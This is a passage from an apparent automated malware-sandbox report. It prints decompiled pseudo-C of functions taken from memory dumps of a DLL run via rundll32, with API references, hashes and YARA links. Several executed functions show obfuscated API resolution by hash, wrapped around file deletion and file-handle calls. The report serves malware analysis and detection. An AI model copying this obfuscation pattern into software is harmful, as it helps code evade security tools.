				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3204CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F3201B7(_t43, 1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t51);
							if(__eflags != 0) {
								E6F320E38(_t60, _t51, 0x6f35e640);
								E6F31FEFF(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F3204CA(__eflags,  *0x6f34619c, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F3204CA(0,  *0x6f34619c, 0);
							_push(0);
							L9:
							E6F31FEFF();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F32048B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f34619c; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F31FE28(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f34619c; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F3204CA(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F3201B7(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t60);
								if(__eflags != 0) {
									E6F320E38(_t60, _t60, 0x6f35e640);
									E6F31FEFF(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F3204CA(__eflags,  *0x6f34619c, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F3204CA(__eflags,  *0x6f34619c, _t20);
								_push(_t60);
								L25:
								E6F31FEFF();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F32048B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6f34619c; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F31FE28(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f34619c; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F3204CA(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6F3201B7(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t54);
											if(__eflags != 0) {
												E6F320E38(_t61, _t54, 0x6f35e640);
												E6F31FEFF(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F3204CA(__eflags,  *0x6f34619c, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F3204CA(0,  *0x6f34619c, 0);
											_push(0);
											L41:
											E6F31FEFF();
											goto L36;
										}
									}
								} else {
									_t54 = E6F32048B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f34619c; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,6F323575,00000000,00000001,6F32084A,?,6F323A32,00000001,?,?,?,6F3207E3,?,00000000), ref: 6F32103F
_free.LIBCMT ref: 6F32109C
_free.LIBCMT ref: 6F3210D2
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F323A32,00000001,?,?,?,6F3207E3,?,00000000,00000000,6F345098,0000002C,6F32084A), ref: 6F3210DD

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f9f1f25d1a78133a9658e2e5eba00bd6b21d1eb6ffc19c7a0e3d033750ef2a1b
Instruction ID: efda33f2bd1a43718351c5f0bc55ccbaaaf504ae581f6340d4c7b026900603f9
Opcode Fuzzy Hash: f9f1f25d1a78133a9658e2e5eba00bd6b21d1eb6ffc19c7a0e3d033750ef2a1b
Instruction Fuzzy Hash: 1811E9B2208BC06ADB007B794E90D5B31ED9BC377D720C229F368861C1DF239C1D8960

Uniqueness

Uniqueness Score: -1.00%

Function 6F321191, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6F321191(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0x6f34619c; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3204CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6F3201B7(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t18);
							if(__eflags != 0) {
								E6F320E38(_t21, _t18, 0x6f35e640);
								E6F31FEFF(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F3204CA(__eflags,  *0x6f34619c, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F3204CA(0,  *0x6f34619c, 0);
							_push(0);
							L9:
							E6F31FEFF();
							goto L4;
						}
					}
				} else {
					_t18 = E6F32048B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f34619c; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(-00000017,6F35E844,00000000,6F3201A9,6F31FEF4,6F35E824,?,6F31C421,0000BC00,6F35E844,00000000), ref: 6F321196
_free.LIBCMT ref: 6F3211F3
_free.LIBCMT ref: 6F321229
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F31C421,0000BC00,6F35E844,00000000), ref: 6F321234

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 711758f47dbbbcfbdc83567b209bd34608792b41b3531da9f50e12ee9cd124a1
Instruction ID: a5bb8919052797971574246731ab0b2c2da94d3433e3f450c76d03bfa1c8204f
Opcode Fuzzy Hash: 711758f47dbbbcfbdc83567b209bd34608792b41b3531da9f50e12ee9cd124a1
Instruction Fuzzy Hash: 0C112BF2208B002AD7007A785D80D1B32EE9BC37BC7205329F268D65C1DF33AC2D8960

Uniqueness

Uniqueness Score: -1.00%

Function 6F325292, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F325292(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f3468f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F32527B();
					E6F32523D();
					_t13 = WriteConsoleW( *0x6f3468f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f3252af
0x6f3252b3
0x6f3252c0
0x6f3252c5
0x6f3252e0
0x6f3252e0
0x6f3252e6

APIs

WriteConsoleW.KERNEL32(?,?,6F32084A,00000000,?,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001), ref: 6F3252A9
GetLastError.KERNEL32(?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000,00000001,?,6F323A56,6F3207E3), ref: 6F3252B5

Part of subcall function 6F32527B: CloseHandle.KERNEL32(FFFFFFFE,6F3252C5,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000,00000001), ref: 6F32528B

___initconout.LIBCMT ref: 6F3252C5

Part of subcall function 6F32523D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F32526C,6F324E04,00000001,?,6F323502,00000000,00000000,00000001,00000000), ref: 6F325250

WriteConsoleW.KERNEL32(?,?,6F32084A,00000000,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000), ref: 6F3252DA

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 628767785ae872e6f62d1ad2e23b024e4cb363287d4a598d9c8669bdb4b03f31
Instruction ID: f8a3c91d601b10318b55d7b45fe551e5edcaf49c3b994ec4f4a13a697f2532f7
Opcode Fuzzy Hash: 628767785ae872e6f62d1ad2e23b024e4cb363287d4a598d9c8669bdb4b03f31
Instruction Fuzzy Hash: A0F03036044715BBCF522F95CC08E893FAEFF0A3B0B144418FA19951A4DB32D9309BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31F52B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6F31F52B(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6F3223D2(_t48, _t59);
						E6F321E1F(_t57, 0, 0x6f35e218, 0x104);
						_t26 =  *0x6f35e7c0; // 0xf63538
						 *0x6f35e7b0 = 0x6f35e218;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f35e218;
							_v20 = 0x6f35e218;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F31F7DC(E6F31F663( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F31F663( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F321D12(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6f35e7b4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f35e7b8 = _t58;
											L18:
											E6F31FEFF(_t37);
											_v12 = 0;
											L19:
											E6F31FEFF(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f35e7b4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f35e7b8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F3201A4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F3201A4(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F3200E7();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F31F56E, 6F31F575, 6F31F5AB

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 70723d517f2245172dde1d332b8e829e5a46cd6d977127abfcf1979ebe1d1ed7
Instruction ID: 016c5de264f9ecc6a8892e459074fb59797a3b6950bdaa884188b5def79f80d1
Opcode Fuzzy Hash: 70723d517f2245172dde1d332b8e829e5a46cd6d977127abfcf1979ebe1d1ed7
Instruction Fuzzy Hash: C34172B1A08714AFDB19DFA9CC80D9EBBFCEF85714F10016AE544A7290E7719A51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F322221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6F322221(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				char _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E6F32233C(__ebx, __ecx, __edx, __eflags);
				_t39 = E6F321FC6(__eflags, _a4);
				_v16 = _t39;
				_t69 =  *(_a12 + 0x48);
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t81 = E6F31FEB1(_t69, 0x220);
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000;
					_t86 = E6F32242D(_t64, _t79, _t81,  *(_a12 + 0x48), __eflags, _v16, _t81);
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E6F321371();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6f346268;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x6f346268) {
								E6F31FEFF( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x6f346788 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6F321EC2( &_v5, _t79, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6f34625c =  *_a16;
								}
							}
						}
						L6:
						E6F31FEFF(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E6F3201A4(__eflags))) = 0x16;
						goto L5;
					}
				}
			}

APIs

Part of subcall function 6F321FC6: GetOEMCP.KERNEL32(00000000,6F32223C,6F323187,00000000,00000000,00000000,00000000,?,6F323187), ref: 6F321FF1

_free.LIBCMT ref: 6F322299
_free.LIBCMT ref: 6F3222CF

Strings

hb4o, xrefs: 6F3222C3

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: hb4o
API String ID: 269201875-4070740096
Opcode ID: 011a0100f11f6cdd9536761aa8f9fe82975f508fd868b2820f24c7c2676148ea
Instruction ID: e89f1e5dc3a7e036098cc2ea4cb4af4af2a4052eda60648403455d411391a321
Opcode Fuzzy Hash: 011a0100f11f6cdd9536761aa8f9fe82975f508fd868b2820f24c7c2676148ea
Instruction Fuzzy Hash: D1319071904349AFEB01DF69CD40BDA7BF4EF85324F15015AE9149B291EB33E951CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6228 Parent PID: 5184 rundll32.exeCOMMON

Executed Functions

Function 1001F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E10002309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

0x1001f796
0x1001f799
0x1001f79c
0x1001f7a1
0x1001f7a6
0x1001f7b0
0x1001f7b6
0x1001f7bd
0x1001f7c4
0x1001f7c8
0x1001f7cf
0x1001f7d6
0x1001f7dd
0x1001f7e4
0x1001f7f0
0x1001f7f8
0x1001f7fb
0x1001f802
0x1001f809
0x1001f810
0x1001f82e
0x1001f839
0x1001f83e

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 1001F839

Strings

Lu, xrefs: 1001F7EB
Lu, xrefs: 1001F81A
$-Y, xrefs: 1001F802
", xrefs: 1001F7C8

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 543db5e143fc82e0febe4e5b84228ca4fb2f9e33671b133290cd188315d44989
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 7911F5B6C00208FBDF09DFE4CC4A9AEBBB5FB54318F108588E915AA251D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001B0E5(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;

				E10022523(_t43);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x970fc6;
				_v28 = 0xf733cf;
				_v12 = 0x7d503f;
				_v12 = _v12 | 0x482efb7d;
				_v12 = _v12 + 0xffffad5b;
				_v12 = _v12 ^ 0x48710332;
				_v20 = 0x599c2f;
				_t54 = 0x26;
				_v20 = _v20 / _t54;
				_v20 = _v20 ^ 0x00074c3c;
				_v8 = 0x25764d;
				_v8 = _v8 + 0xffffd21e;
				_v8 = _v8 + 0x28dd;
				_v8 = _v8 ^ 0x00291a50;
				_v16 = 0x4f32db;
				_v16 = _v16 | 0x18cb750c;
				_v16 = _v16 ^ 0x18cb774b;
				_t51 = E10002309(0x234, _t54, _t54, 0x491df8aa, _t54, 0x9c9047d0);
				_t52 =  *_t51(_a16, 0, _a24, 0x28, __ecx, __edx, 0x28, _a8, 0, _a16, _a20, _a24); // executed
				return _t52;
			}

0x1001b0fd
0x1001b102
0x1001b109
0x1001b112
0x1001b119
0x1001b120
0x1001b127
0x1001b12e
0x1001b135
0x1001b141
0x1001b149
0x1001b14c
0x1001b153
0x1001b15a
0x1001b161
0x1001b168
0x1001b16f
0x1001b176
0x1001b17d
0x1001b19d
0x1001b1af
0x1001b1b4

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,00970FC6,00000028), ref: 1001B1AF

Strings

?P}, xrefs: 1001B119
Mv%, xrefs: 1001B153

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileHandleInformation
String ID: ?P}$Mv%
API String ID: 3935143524-2885159553
Opcode ID: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction ID: c6294db63f7ee4bb071aec84c080713cd91fe9e816122fc1ccfe0a57a864389e
Opcode Fuzzy Hash: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction Fuzzy Hash: A02164B2D0120DFFDF54CF98CD4AAAEBBB1FB04305F008188E915A6290E3B55B248F90

Uniqueness

Uniqueness Score: -1.00%

Function 100142E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E100142E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E10002309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x100142ed
0x100142f2
0x100142f4
0x100142f7
0x100142f9
0x100142fa
0x100142fd
0x10014300
0x10014301
0x10014302
0x10014307
0x10014311
0x1001431a
0x1001431d
0x10014320
0x1001432d
0x10014334
0x10014337
0x1001433b
0x10014342
0x10014349
0x10014350
0x10014357
0x1001435e
0x1001436b
0x10014377
0x1001437a
0x10014381
0x10014388
0x1001438c
0x1001439f
0x100143aa
0x100143b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 100143AA

Strings

zAo+, xrefs: 10014350

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: 613f1e34ca62f437a9a883da1f6942e021cbcbe0c1bd7b5908013fed4c35e44f
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: 4D2128B1D00218FF9B08CF99D98A8EEBFB9FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
